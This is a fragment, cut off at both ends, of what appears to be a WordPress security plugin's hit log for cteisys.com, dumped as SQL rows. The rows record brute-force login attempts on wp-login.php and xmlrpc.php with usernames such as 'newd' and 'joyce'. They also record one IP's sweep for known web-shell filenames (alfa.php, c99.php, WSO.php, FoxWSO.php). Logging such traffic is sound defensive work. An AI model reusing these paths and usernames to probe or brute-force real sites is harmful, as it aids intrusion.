.5618,55,'u8QGrfaWBK4L6vUohD5bkpZA','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('20.118.129.10',343310602,'',0,1665249247.5924,55,'f5X9DEiaLAx4sMVOGKk8UutF','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('20.118.129.10',343310602,'',0,1665249242.6746,55,'g8NfuPrbt2lCTsRL95YxmF7Q','','19|0|0|0|cteisys.com/ok.php',0,19,0),('69.163.196.200',1168360648,'newd',0,1665200456.4029,7,'h53aRPXnpEzVmty7okKBgMAl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.174.27',3114053147,'Joyce',0,1665199966.2974,152,'bBJy1vFilA8SC9GsoPXDE5qp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.52.207',2703439055,'newd',0,1665198765.6271,7,'oTnkc5NLgIlUyez9YuJACEaZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665249232.7999,55,'RCNxiEf14K02SQljFHrIyU5a','','19|0|0|0|cteisys.com/o.php',0,19,0),('51.178.138.5',867338757,'newd',0,1665208895.0717,7,'ZckiCGustvByJS6hUN2F5fdg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1665208895.0717,152,'ZE8HCDUl2t5SGve7gmJKqjsT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.125.241',3098050033,'newd',0,1665208630.5578,152,'O4dAQ5qWlnIs6KxR3pmT8t1Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.248.14',2733766670,'newd',0,1665208422.4067,152,'glHPtAiuWFS2e75qLwXkb081','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.28.36.205',1729897677,'newd',0,1665208149.1639,152,'1q9odNFQmtgGHu2XljLanPwO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.166',1046910118,'joyce',0,1665204368.7257,152,'9LXslFId4Tz2HCADrVS57Bmp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1665203835.3599,7,'t7fS6gApGFe2waOoijRLB958','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.97.162.248',3512836856,'newd',0,1665202133.0090,7,'ZKHELusfhPSM3CqV7rjXD60R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('87.101.92.171',1466260651,'joyce',0,1665201974.0417,152,'BYxCLE6UtfynFqGWKkis7Q92','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1665207659.7673,152,'cq5STOM9HWeZYrtXpUojJmVv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.203',2249438155,'Joyce',0,1665207505.6264,152,'43uIEPjGrki1KM8Ayo5xgVY6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.115.107',2733732715,'newd',0,1665207416.3292,152,'L4ifED5NCS0lVkJUK2IsuByG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1665207196.0677,7,'WahJnRCb0QgY1EtAqKsI7vPu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('74.220.219.213',1255988181,'newd',0,1665207190.4941,152,'pQlWGZUgdH3n7cPyrmies21R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.137.177',3193735601,'newd',0,1665206898.4027,152,'6uVbKD3pTYUScgfmyNztCPsn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.219',3583549915,'Joyce',0,1665206742.7955,152,'lPsHWGOzmgctQ7LThBbK46F0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1665206629.5257,152,'henBcU64pFK8zM2WvJZgob0N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.76.35',2454080547,'joyce',0,1665206604.5295,152,'t7LkjMX2RwYCE3GVznSA0ZqB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.153.249.218',2694445530,'newd',0,1665206401.5194,152,'GO9p5CShNVxibuHkDda37RTP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.115.107',2733732715,'newd',0,1665206151.1427,152,'jzHM1NlBbSy7XYsAKFdixqVR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.217.237',2733758957,'newd',0,1665205873.1195,152,'z0I28R5j36FeMixusqNWSl7P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'admin',0,1665205560.7541,152,'VFkf0lw86LhZNjJE9proeWsS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'admin',0,1665205283.3156,152,'5IG3Vq2d4JBHhb6p89tCEmso','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.118.129.10',343310602,'',0,1665249230.0379,55,'VTer0Mc8ZPOblHWuRonXYIfU','','19|0|0|0|cteisys.com/new.php',0,19,0),('20.118.129.10',343310602,'',0,1665249226.7708,55,'zdX6RIPr1cxHh0YK3WZNSbw9','','19|0|0|0|cteisys.com/n.php',0,19,0),('124.70.98.118',2084987510,'newd',0,1665212333.5427,152,'Ehs0SRF3omk4g9PvK8qpHQCW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1665212253.7378,7,'Qr0p9iecSWBGLA4y8dJlsHPC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1665212100.9340,152,'tmOao2WSd3C4RVnQjIrwi9Uy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1665211609.3031,152,'QGcATDwovrLI9NVyKEX5hU8Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.1.31',610009375,'newd',0,1665211106.4338,152,'AT2R6SK3QwEr9Wpn74JgoxX8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.44.6',908471302,'newd',0,1665210909.8180,152,'ON3xBz9uy2FTEakdSX87f4Dv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1665210655.5089,152,'AiH8DIQURmapXWMl2rsN046E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1665210594.5235,7,'wAYlLV3Hn7OGhCzxkicEbfWX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('42.200.109.156',717778332,'newd',0,1665210370.7507,152,'VN3B7KYOpD2wtbFELU4Zcqf5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1665210183.8979,152,'7q0O4yNYLr8ImuCzWoE6AKfM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'newd',0,1665209864.7367,152,'ryBpMOuEoFU71ieTKIhQYJ85','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.71.253',2338539517,'newd',0,1665209811.5979,152,'8pL3YNDzcv4yUVE1e5QbgFio','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('51.79.144.41',860852265,'newd',0,1665209627.4687,152,'Q6PowGpVau9ZkLjXIrH2fRiO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.178.73',2160570953,'newd',0,1665209117.3304,152,'dJsvVAl0S9OH7p4ba5kxKjXe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.118.129.10',343310602,'',0,1665249222.7702,55,'DeozFTBaINhJ4Wg95Q3kKSYv','','19|0|0|0|cteisys.com/mini.php',0,19,0),('20.118.129.10',343310602,'',0,1665249219.1086,55,'AI5XwvaZS8NVs61BQD2LkOzm','','19|0|0|0|cteisys.com/marijuana.php',0,19,0),('20.118.129.10',343310602,'',0,1665249212.3521,55,'N94rRIoUCLgqY6QEnmuBfPtT','','19|0|0|0|cteisys.com/mari.php',0,19,0),('20.118.129.10',343310602,'',0,1665249208.1296,55,'DLUQcsxv06t4SCeMYPbdHjJG','','19|0|0|0|cteisys.com/mar.php',0,19,0),('20.118.129.10',343310602,'',0,1665249204.5387,55,'oigJbUGChztnu84QeZjI6M0B','','19|0|0|0|cteisys.com/m.php',0,19,0),('20.118.129.10',343310602,'',0,1665249199.6215,55,'81C0DaQjRyx4H2IA5zPrMvti','','19|0|0|0|cteisys.com/license.php',0,19,0),('20.118.129.10',343310602,'',0,1665249193.9418,55,'ki7G0ovQyaf6Aw31rx8UTSe9','','19|0|0|0|cteisys.com/l.php',0,19,0),('20.118.129.10',343310602,'',0,1665249189.6932,55,'WVbqHgFTiBC4GXDYxRUINaKZ','','19|0|0|0|cteisys.com/k.php',0,19,0),('20.118.129.10',343310602,'',0,1665249187.5907,55,'JF3adRLe5WMc1tV0sODCprfI','','19|0|0|0|cteisys.com/jindex.php',0,19,0),('20.118.129.10',343310602,'',0,1665249183.1900,55,'Dd2kuSWaKh15jl8wJCN3nIzy','','19|0|0|0|cteisys.com/images/about.php',0,19,0),('185.76.77.160',3108785568,'newd',0,1665215912.5644,152,'nReqgJ5CTwXPzdEVk7DjpAZh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1665215633.5473,152,'b5EZ1gT2Uscp8HrDY7VAQhSl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.166.39.15',1386620687,'newd',0,1665215499.2660,7,'2vZqjtXod8a54AbKkeNirSun','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.119.122.23',1433893399,'newd',0,1665215370.0455,152,'LQV2pweCGyAdcmKsaE8qlFt0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1665215095.7299,152,'TJRzXM7vcLHSexs2KnDw5fIN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'newd',0,1665214802.7963,152,'ugqpvQisT3cYIFK6HCXMy5h7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.247.212',1807022036,'newd',0,1665214035.6550,152,'cCRlq5boOyztrZ4S8QPhHMjf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.140.67',2310573123,'newd',0,1665213761.7624,152,'WsgJ3QbSoevV48dF9IOpxzun','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.222.69',1363467845,'newd',0,1665213517.0399,152,'m8RwNHaT3tkQ5jlJDM0I6FsB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.69.26.40',2655328808,'newd',0,1665213279.3451,152,'PiC4ceVjlEfD5mLR1nNrbw3H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1665213045.0263,152,'pzA4Ov2aYVZKJSmtlfGDXk1r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'newd',0,1665212600.3567,152,'MarF49vGnwus8LjCPJmKygVX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.118.129.10',343310602,'',0,1665249180.0944,55,'kwvWR5VKHgJA1sSx0EuZXznU','','19|0|0|0|cteisys.com/i.php',0,19,0),('20.118.129.10',343310602,'',0,1665249176.9233,55,'Q4lnfd2DzRpwOUSAGI0cj7vx','','19|0|0|0|cteisys.com/hello.php',0,19,0),('20.118.129.10',343310602,'',0,1665249173.1935,55,'HQ5qVF6hInCBTJYOukj1Nw3E','','19|0|0|0|cteisys.com/haxor.php',0,19,0),('20.118.129.10',343310602,'',0,1665249172.1456,55,'1Ak8IweRM9B4a0GUKxWDpu2h','','19|0|0|0|cteisys.com/h.php',0,19,0),('20.118.129.10',343310602,'',0,1665249167.0944,55,'IW7RlZ8YLnMz9xHfGraDOehK','','19|0|0|0|cteisys.com/goods.php',0,19,0),('20.118.129.10',343310602,'',0,1665249158.8720,55,'4h9WqOv7NsAiCMUkgyf8RBP2','','19|0|0|0|cteisys.com/g.php',0,19,0),('34.254.111.139',587100043,'newd',0,1665218973.9943,152,'qoLmJN0Pd2bY1puZ9feyAcTG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1665218855.6167,7,'T7A5xEiaqlJZrF16By8RSz3C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1665218660.2402,152,'QshDTwdi8HV3jtZ7rUp05Enx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.66.131',3270066819,'newd',0,1665218328.1689,152,'TzXD0WSN8a6yJ2xk7mqFLABj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1665218014.8714,152,'kmNZx15D89rLtj36BETgeMHz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.59.165.88',3258688856,'newd',0,1665217391.9905,152,'P3azGuVbinw8p7eZJX14DyUY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.138.252.123',3649764475,'Joyce',0,1665217391.9351,152,'w6f20HkVMyCYAutUFph83NeJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1665217160.5056,7,'7bTNkaq6zSidnPHYK5LQEBlV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665217110.1839,152,'H4VsE8GoP1fxyp9CkaWrKBIt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.138.195.19',3649749779,'joyce',0,1665216861.9416,152,'X0uc5BeAkjILTWwbts2fD6vP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'newd',0,1665216784.4351,152,'JjroPT5ROKunAYyVfEHgLwbX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.149.125.220',882212316,'',0,1665216759.2379,55,'IVtjYk6Xax7MEDdR1mAvFsic','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('52.149.125.220',882212316,'',0,1665216756.1285,55,'jk9th6KS2FxZ4ilCNryImoUD','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('80.87.194.140',1347928716,'newd',0,1665216534.0900,152,'mAjHCvGcpklzWtqb3Yd4a09r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.118.129.10',343310602,'',0,1665249154.7624,55,'i0QSWCjUpTwfO6Xxnb18tFVN','','19|0|0|0|cteisys.com/fox.php',0,19,0),('20.118.129.10',343310602,'',0,1665249151.5949,55,'WIPuwfRdE61nFTecgKMqkAxC','','19|0|0|0|cteisys.com/f.php',0,19,0),('15.235.168.187',267102395,'newd',0,1665223006.4229,152,'cmdPkvx5a8nHByjMLOIiFwXf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1665222225.2013,7,'Vx7n45pQSM1HBd2aiqyDRcwo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.120.132.91',628655195,'joyce',0,1665222044.7995,152,'fpd0xgG1BOiJ2I8qwYsbzQMR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.45.66.25',3106751001,'newd',0,1665221761.3666,152,'oUew0WsaAMcPSFgGf1QKI5b2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'newd',0,1665221424.6500,152,'RbeCdFAtMVsvmzgUNoqHS3Op','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.153.8.103',3113814119,'newd',0,1665221043.4200,152,'CDQzLFeiJM5aSoqXfHP96cn8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1665220527.0316,7,'JU9YyDfA4xdpz71hml20WGIa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.203',2249438155,'Joyce',0,1665220511.4298,152,'COKXMuV7H13yUtGYwnWSoR5d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665220329.9852,152,'O7x1pXJuE6io9WD3VPjbIHCq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.251.22',869464854,'newd',0,1665220007.0792,152,'yoKrQ6X9TwzSjiPYkhc8lBFC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.118.129.10',343310602,'',0,1665249148.6512,55,'fuk6Tr4jgWsdLPFB8bM9mzlJ','','19|0|0|0|cteisys.com/edit-form.php',0,19,0),('20.118.129.10',343310602,'',0,1665249141.6672,55,'B5r8GgdiDVOYsEuWSpZzMy23','','19|0|0|0|cteisys.com/e.php',0,19,0),('20.118.129.10',343310602,'',0,1665249138.4814,55,'tNV56iIS7HoDJG2QBYW914bp','','19|0|0|0|cteisys.com/doc.php',0,19,0),('20.118.129.10',343310602,'',0,1665249137.3368,55,'y3jf6Bq41KAdLeuRDXSTFItn','','19|0|0|0|cteisys.com/date.php',0,19,0),('20.118.129.10',343310602,'',0,1665249134.7373,55,'MjxXmDeUACWbYif6lKdy1PGr','','19|0|0|0|cteisys.com/content.php',0,19,0),('20.118.129.10',343310602,'',0,1665249131.9811,55,'Aai71IbqZovrQujMKW9clHkO','','19|0|0|0|cteisys.com/c99.php',0,19,0),('20.118.129.10',343310602,'',0,1665249125.5942,55,'bUjz5eHW1ymkca6LGgCAhfMK','','19|0|0|0|cteisys.com/c.php',0,19,0),('20.118.129.10',343310602,'',0,1665249122.0450,55,'CvNwVD6Mybj9xR5tWhgmnYFZ','','19|0|0|0|cteisys.com/bypass.php',0,19,0),('20.118.129.10',343310602,'',0,1665249120.3997,55,'2dfiaQhjYm6SFlrUVGvncetL','','19|0|0|0|cteisys.com/blog/fw.php',0,19,0),('217.138.252.123',3649764475,'Joyce',0,1665226752.6277,152,'v3XNdxiozTjIg6au4hCtqVJ2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1665225602.7675,7,'Umw9IW2CuzDLe5jVKiMYgb0R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.175.35',3114053411,'Joyce',0,1665224708.7653,152,'ECyr5QKJBzcZ9RunjFlU863I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.120.155.179',628661171,'joyce',0,1665224025.2031,152,'S9FM6Q8o3tGCkjnTJgqxBhdK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.47.206',861482958,'newd',0,1665223910.1380,7,'fHkj4SgPhu30nNQEvLUZGX5z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665249115.7085,55,'IbvpNFuHrnATLce68GgzyE4w','','19|0|0|0|cteisys.com/blog.php',0,19,0),('20.118.129.10',343310602,'',0,1665249111.1788,55,'x5ucpmeQozhfd2sMLlHIvNKA','','19|0|0|0|cteisys.com/b.php',0,19,0),('20.118.129.10',343310602,'',0,1665249108.1178,55,'JyEMFwp1lGTQt84LOKVAn3hz','','19|0|0|0|cteisys.com/autoload_classmap.php',0,19,0),('20.118.129.10',343310602,'',0,1665249104.0583,55,'HMAp1ES92GNFi3aL4WRYkVtg','','19|0|0|0|cteisys.com/alwso.php',0,19,0),('20.118.129.10',343310602,'',0,1665249099.4432,55,'DBi3bQkxUHNOfvInL4Al91J8','','19|0|0|0|cteisys.com/alfashell.php',0,19,0),('20.118.129.10',343310602,'',0,1665249095.1434,55,'ziMEDu6JRy40lH2cgKrTh5LW','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('20.118.129.10',343310602,'',0,1665249089.4580,55,'521xchSIR6JegwHanzM0qZP8','','19|0|0|0|cteisys.com/alf.php',0,19,0),('178.217.190.82',3000614482,'newd',0,1665230728.5129,7,'8MaqKpiGRcyrCxVNuL096T3J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.118',3583549814,'Joyce',0,1665230717.6282,152,'zniUhdA4wWfMsKjEcoN7LRTD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.27.171',1382423467,'joyce',0,1665230717.6278,152,'bhDqNo80aw61pxXP74sfSQ3J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.242.103',795603559,'newd',0,1665229003.1649,7,'8K9DUeviHswB4F5APbo2MGNr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.19',3328324115,'newd',0,1665227550.3093,152,'BQY4oyrEmnhx5jfMlHsTvJwX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.75.65.218',575357402,'newd',0,1665227310.9503,7,'bAukm1XtCexoRFWOrI5EqlJj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665249081.5615,55,'GLf32uoMgFCEyvpd4mBk10Rq','','19|0|0|0|cteisys.com/about.php',0,19,0),('20.118.129.10',343310602,'',0,1665249078.3683,55,'CTBN7Vu3bio8xJjGZQgXr4aM','','19|0|0|0|cteisys.com/a.php',0,19,0),('20.118.129.10',343310602,'',0,1665249075.6702,55,'WMEfeBiJvRgb7VLDANI05zw8','','19|0|0|0|cteisys.com/WSO.php',0,19,0),('20.118.129.10',343310602,'',0,1665249073.5871,55,'GTrOKPWYsIpeBxJHbAju9Mqz','','19|0|0|0|cteisys.com/FoxWSO.php',0,19,0),('103.90.232.106',1734010986,'admin',0,1665234122.5335,152,'nVCLMI7Zz6OeEGw24dQ5fXpg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.137.176.23',3632902167,'',0,1665234083.2617,10,'gREtnWIuDi78xcl3ydZ6CszT','','707|0|0|0|cteisys.com/3index.php',0,707,0),('216.137.176.23',3632902167,'',0,1665234083.2598,55,'reHwA3ChGk4VxlU0tjY5S9Ec','','19|0|0|0|cteisys.com/wikindex.php',0,19,0),('216.137.176.23',3632902167,'',0,1665234083.2588,55,'upIj69CyDZdOBtP1vcmgVGRr','','19|0|0|0|cteisys.com/wp-content/mu-plugins-old/index.php',0,19,0),('216.137.176.23',3632902167,'',0,1665234083.2584,55,'ih2wIM7Q1EcbgvpSDfZKNkUo','','19|0|0|0|cteisys.com/class-wp-widget-archives.php',0,19,0),('216.137.176.23',3632902167,'',0,1665234083.2577,55,'gREtnWIuDi78xcl3ydZ6CszT','','19|0|0|0|cteisys.com/3index.php',0,19,0),('216.137.176.23',3632902167,'',0,1665234083.2466,55,'Au94ZrQb3TDKdBCRNFv75zO0','','19|0|0|0|cteisys.com/admin.php',0,19,0),('20.118.129.10',343310602,'',0,1665249070.2671,55,'ps6WKvrgI4whxoXFnqY1NuAG','','19|0|0|0|cteisys.com/Alfa.php',0,19,0),('20.118.129.10',343310602,'',0,1665249061.4702,55,'Y38UlOGukanL5VqjyiTKP2Fs','','19|0|0|0|cteisys.com/9.php',0,19,0),('20.118.129.10',343310602,'',0,1665249060.3160,55,'04VHvXSA2eN1lWyDBKmU5IFY','','19|0|0|0|cteisys.com/5.php',0,19,0),('20.118.129.10',343310602,'',0,1665249046.6175,55,'PDCk3R7GmBzS8A0Kepl5nYsO','','19|0|0|0|cteisys.com/404.php',0,19,0),('20.118.129.10',343310602,'',0,1665249040.1736,55,'mqiN1KhJYpWbA5UHfxyZGrS0','','19|0|0|0|cteisys.com/403.php',0,19,0),('177.52.160.29',2973016093,'newd',0,1665236279.8702,152,'4qo7ZrQnJOMVNjdh9icRfzPk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1665235868.3575,7,'v75AroePm69ZQCROTJHkpWUj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('116.255.178.218',1962914522,'newd',0,1665235867.1218,152,'dnv7WXtAgE1sj6VfLuIReUp2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.158',1046910110,'joyce',0,1665235515.5607,152,'p4UMqF9OBA8HGklTDi3xC6Zn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1665234989.6940,152,'COnfGIWudD7bZN6qKHpQwoYL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'admin',0,1665234559.8466,152,'zUSMhWX8aLiCBsEbf3RcOP7T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665234154.4613,7,'fuJ1kSYzljPrNwDGBvexd7yO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665249037.4400,55,'2kDhMLPeysmQb3wfUCKBzqpi','','19|0|0|0|cteisys.com/4.php',0,19,0),('20.118.129.10',343310602,'',0,1665249034.4461,55,'gT2RYKCacVpohMdBHF8qk1uU','','19|0|0|0|cteisys.com/3.php',0,19,0),('20.118.129.10',343310602,'',0,1665248987.8961,55,'eDYHMNhfItrpVWRsqc3Q5vy8','','19|0|0|0|cteisys.com/01.php',0,19,0),('20.118.129.10',343310602,'',0,1665248984.0971,55,'pJEF8ODBVUvuT6wcer3mRj17','','19|0|0|0|cteisys.com/0.php',0,19,0),('20.118.129.10',343310602,'',0,1665248975.4458,55,'Lr3WTMPa9nRi6V1Es25ubQSD','','19|0|0|0|cteisys.com/1index.php',0,19,0),('20.118.129.10',343310602,'',0,1665248967.3687,55,'Q6s3MVZbf2tXqBGlmHToENLn','','19|0|0|0|cteisys.com/wikindex.php',0,19,0),('20.118.129.10',343310602,'',0,1665248963.0282,55,'0eUFuHh2YrBRVEg5p1Z7AxmJ','','19|0|0|0|cteisys.com/ups.php',0,19,0),('202.21.38.119',3390383735,'newd',0,1665240238.1947,7,'1fgxUuemhY4zbqsPrMwK6kT7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.17',3355043345,'Joyce',0,1665239293.3108,152,'MYfwgxeXdnPpToDLGv5qjAim','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.108.148.88',661427288,'newd',0,1665238210.5965,7,'xDhwzUdb6TNRm4cvGIq7riX9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665248960.1681,55,'RXrQgCO6EW0pizP2wDdmxGUT','','19|0|0|0|cteisys.com/fx.php',0,19,0),('20.118.129.10',343310602,'',0,1665248958.6910,10,'EaPHzhoj5bmIrdK7VDZAgwTp','','707|0|0|0|cteisys.com/fw.php',0,707,0),('20.118.129.10',343310602,'',0,1665248958.6849,55,'EaPHzhoj5bmIrdK7VDZAgwTp','','19|0|0|0|cteisys.com/fw.php',0,19,0),('20.118.129.10',343310602,'',0,1665248957.0097,55,'fuIcwr6zxPFYZH7XjOhUsM1C','','19|0|0|0|cteisys.com/radio.php',0,19,0),('20.118.129.10',343310602,'',0,1665248950.9969,55,'y8wtuUWbJ4lkdne0zN5QXqoM','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('36.94.142.166',610176678,'newd',0,1665244331.7961,7,'3C60AviLxJzjaQq5u9UhyGHI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.54.127',3496818303,'newd',0,1665242285.7970,7,'0fYldBGvZFpkxEA7iIq65NgS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.118.129.10',343310602,'',0,1665248947.2198,55,'lPZBKk9MxChfbIUao2HTtGDz','','19|0|0|0|cteisys.com/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('20.118.129.10',343310602,'',0,1665248943.2622,55,'OSFWeIHADTo70s3KZBvlJpuE','','19|0|0|0|cteisys.com/Makhdamxshell.php',0,19,0),('171.244.0.91',2884894811,'newd',0,1665248391.5123,7,'JGElOSTmDy0xjsHaZrbW6fvM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.167.244.51',1806169139,'Joyce',0,1665247573.6172,152,'rF1csa4nuWVIjJGd0fvHBNlK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.243',2249438195,'joyce',0,1665247042.7644,152,'vk92Aj3mfxgbTWhoCtKGU56R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1665246366.3036,7,'RMZ5dPr0ieTFUSsphjOlf9Hv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.102.27.195',1382423491,'joyce',0,1665245258.9644,152,'lLNsPvX0k6c3RqJzA81oyIwG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.118.129.10',343310602,'',0,1665249031.9358,55,'v36WgMhCP94kN2ufsoULa7JF','','19|0|0|0|cteisys.com/2index.php',0,19,0),('20.118.129.10',343310602,'',0,1665249028.2239,55,'kKCsQim4T5N2Ju1WwagSDzeG','','19|0|0|0|cteisys.com/2.php',0,19,0),('20.118.129.10',343310602,'',0,1665249024.0974,55,'rIb7tZKdhUG64cMJviYsFzkj','','19|0|0|0|cteisys.com/1337.php',0,19,0),('20.118.129.10',343310602,'',0,1665249019.6301,55,'PyxGvRh2QMjad40epcJ3Tl69','','19|0|0|0|cteisys.com/13.php',0,19,0),('20.118.129.10',343310602,'',0,1665249015.2547,55,'B92F6qA10v84jwgyl3ETCsXU','','19|0|0|0|cteisys.com/11index.php',0,19,0),('20.118.129.10',343310602,'',0,1665249008.6737,55,'I4HTiZEJj1Wa2QCFw89Asgqk','','19|0|0|0|cteisys.com/10.php',0,19,0),('20.118.129.10',343310602,'',0,1665249013.4722,55,'UAiSOgEKVsWJ53PewlMQ6qmh','','19|